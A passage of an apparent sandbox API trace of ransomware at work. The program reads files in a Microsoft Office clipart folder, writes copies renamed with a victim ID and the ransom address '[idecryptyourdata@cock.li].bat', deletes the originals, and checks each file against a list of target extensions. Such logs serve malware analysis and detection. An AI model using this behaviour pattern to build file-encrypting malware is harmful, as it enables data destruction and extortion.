[0069.789] ReadFile (in: hFile=0x36c, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.789] WriteFile (in: hFile=0x308, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.789] SetEndOfFile (hFile=0x308) returned 1 [0069.789] CloseHandle (hObject=0x308) returned 1 [0069.789] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.789] SetEndOfFile (hFile=0x36c) returned 1 [0069.790] CloseHandle (hObject=0x36c) returned 1 [0069.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.790] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf")) returned 1 [0069.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.791] lstrlenW (lpString=".doc") returned 4 [0069.791] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString=".docx") returned 5 [0069.791] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0069.791] lstrlenW (lpString=".pdf") returned 4 [0069.791] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString=".xls") returned 4 [0069.791] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.791] lstrlenW (lpString=".xlsx") returned 5 [0069.791] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0069.791] lstrlenW (lpString=".ppt") returned 4 [0069.791] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.791] lstrlenW (lpString=".zip") returned 4 [0069.791] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.791] lstrlenW (lpString=".rar") returned 4 [0069.791] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString=".bz2") returned 4 [0069.791] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString=".7z") returned 3 [0069.791] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.791] lstrlenW (lpString=".dbf") returned 4 [0069.791] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.791] lstrlenW (lpString=".1cd") returned 4 [0069.791] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 68 [0069.792] lstrlenW (lpString=".jpg") returned 4 [0069.792] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.801] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.801] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.802] GetLastError () returned 0x0 [0069.802] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2610, lpOverlapped=0x0) returned 1 [0069.805] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2620, lpOverlapped=0x0) returned 1 [0069.806] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.807] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.807] SetEndOfFile (hFile=0x368) returned 1 [0069.810] CloseHandle (hObject=0x368) returned 1 [0069.810] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.810] SetEndOfFile (hFile=0x340) returned 1 [0069.811] CloseHandle (hObject=0x340) returned 1 [0069.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf")) returned 1 [0069.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.812] lstrlenW (lpString=".doc") returned 4 [0069.812] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.812] lstrlenW (lpString=".docx") returned 5 [0069.812] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0069.812] lstrlenW (lpString=".pdf") returned 4 [0069.812] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.812] lstrlenW (lpString=".xls") returned 4 [0069.812] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.812] lstrlenW (lpString=".xlsx") returned 5 [0069.812] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0069.812] lstrlenW (lpString=".ppt") returned 4 [0069.812] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.812] lstrlenW (lpString=".zip") returned 4 [0069.812] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.812] lstrlenW (lpString=".rar") returned 4 [0069.812] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.812] lstrlenW (lpString=".bz2") returned 4 [0069.812] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.813] lstrlenW (lpString=".7z") returned 3 [0069.813] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.813] lstrlenW (lpString=".dbf") returned 4 [0069.813] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.813] lstrlenW (lpString=".1cd") returned 4 [0069.813] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 68 [0069.813] lstrlenW (lpString=".jpg") returned 4 [0069.813] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.815] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.815] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0069.826] GetLastError () returned 0x0 [0069.826] ReadFile (in: hFile=0x380, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x150a, lpOverlapped=0x0) returned 1 [0069.859] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1510, lpOverlapped=0x0) returned 1 [0069.860] ReadFile (in: hFile=0x380, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.860] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.860] SetEndOfFile (hFile=0x340) returned 1 [0069.860] CloseHandle (hObject=0x340) returned 1 [0069.861] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.861] SetEndOfFile (hFile=0x380) returned 1 [0069.861] CloseHandle (hObject=0x380) returned 1 [0069.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.862] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf")) returned 1 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString=".doc") returned 4 [0069.864] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString=".docx") returned 5 [0069.864] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0069.864] lstrlenW (lpString=".pdf") returned 4 [0069.864] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString=".xls") returned 4 [0069.864] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.864] lstrlenW (lpString=".xlsx") returned 5 [0069.864] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0069.864] lstrlenW (lpString=".ppt") returned 4 [0069.864] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString=".zip") returned 4 [0069.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.864] lstrlenW (lpString=".rar") returned 4 [0069.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString=".bz2") returned 4 [0069.864] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString=".7z") returned 3 [0069.864] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString=".dbf") returned 4 [0069.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString=".1cd") returned 4 [0069.864] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 68 [0069.864] lstrlenW (lpString=".jpg") returned 4 [0069.864] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.865] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.865] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.868] GetLastError () returned 0x0 [0069.868] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4162, lpOverlapped=0x0) returned 1 [0069.971] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4170, lpOverlapped=0x0) returned 1 [0069.972] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.972] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.972] SetEndOfFile (hFile=0x368) returned 1 [0069.972] CloseHandle (hObject=0x368) returned 1 [0069.972] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.972] SetEndOfFile (hFile=0x340) returned 1 [0069.973] CloseHandle (hObject=0x340) returned 1 [0069.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.974] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg")) returned 1 [0069.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.974] lstrlenW (lpString=".doc") returned 4 [0069.974] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.974] lstrlenW (lpString=".docx") returned 5 [0069.974] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0069.974] lstrlenW (lpString=".pdf") returned 4 [0069.974] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.974] lstrlenW (lpString=".xls") returned 4 [0069.974] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.974] lstrlenW (lpString=".xlsx") returned 5 [0069.974] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0069.974] lstrlenW (lpString=".ppt") returned 4 [0069.974] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.974] lstrlenW (lpString=".zip") returned 4 [0069.974] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.974] lstrlenW (lpString=".rar") returned 4 [0069.974] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.974] lstrlenW (lpString=".bz2") returned 4 [0069.975] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.975] lstrlenW (lpString=".7z") returned 3 [0069.975] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.975] lstrlenW (lpString=".dbf") returned 4 [0069.975] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.975] lstrlenW (lpString=".1cd") returned 4 [0069.975] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 68 [0069.975] lstrlenW (lpString=".jpg") returned 4 [0069.975] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.980] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.980] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.981] GetLastError () returned 0x0 [0069.981] ReadFile (in: hFile=0x380, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xab74, lpOverlapped=0x0) returned 1 [0070.040] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xab80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xab80, lpOverlapped=0x0) returned 1 [0070.042] ReadFile (in: hFile=0x380, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.042] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.042] SetEndOfFile (hFile=0x36c) returned 1 [0070.042] CloseHandle (hObject=0x36c) returned 1 [0070.042] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.042] SetEndOfFile (hFile=0x380) returned 1 [0070.043] CloseHandle (hObject=0x380) returned 1 [0070.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg")) returned 1 [0070.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.044] lstrlenW (lpString=".doc") returned 4 [0070.044] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0070.044] lstrlenW (lpString=".docx") returned 5 [0070.044] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0070.044] lstrlenW (lpString=".pdf") returned 4 [0070.044] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0070.044] lstrlenW (lpString=".xls") returned 4 [0070.044] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0070.044] lstrlenW (lpString=".xlsx") returned 5 [0070.044] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0070.044] lstrlenW (lpString=".ppt") returned 4 [0070.044] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0070.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.044] lstrlenW (lpString=".zip") returned 4 [0070.044] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0070.044] lstrlenW (lpString=".rar") returned 4 [0070.045] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0070.045] lstrlenW (lpString=".bz2") returned 4 [0070.045] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0070.045] lstrlenW (lpString=".7z") returned 3 [0070.045] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0070.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.045] lstrlenW (lpString=".dbf") returned 4 [0070.045] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0070.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.045] lstrlenW (lpString=".1cd") returned 4 [0070.045] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0070.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 68 [0070.045] lstrlenW (lpString=".jpg") returned 4 [0070.045] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0070.052] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.053] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0070.055] GetLastError () returned 0x0 [0070.055] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4dd3, lpOverlapped=0x0) returned 1 [0070.073] WriteFile (in: hFile=0x308, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4de0, lpOverlapped=0x0) returned 1 [0070.074] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.074] WriteFile (in: hFile=0x308, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.074] SetEndOfFile (hFile=0x308) returned 1 [0070.074] CloseHandle (hObject=0x308) returned 1 [0070.074] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.074] SetEndOfFile (hFile=0x340) returned 1 [0070.076] CloseHandle (hObject=0x340) returned 1 [0070.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.076] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif")) returned 1 [0070.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.077] lstrlenW (lpString=".doc") returned 4 [0070.077] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.077] lstrlenW (lpString=".docx") returned 5 [0070.078] lstrcmpiW (lpString1=".docx", lpString2="5.GIF") returned -1 [0070.078] lstrlenW (lpString=".pdf") returned 4 [0070.078] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.078] lstrlenW (lpString=".xls") returned 4 [0070.078] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.078] lstrlenW 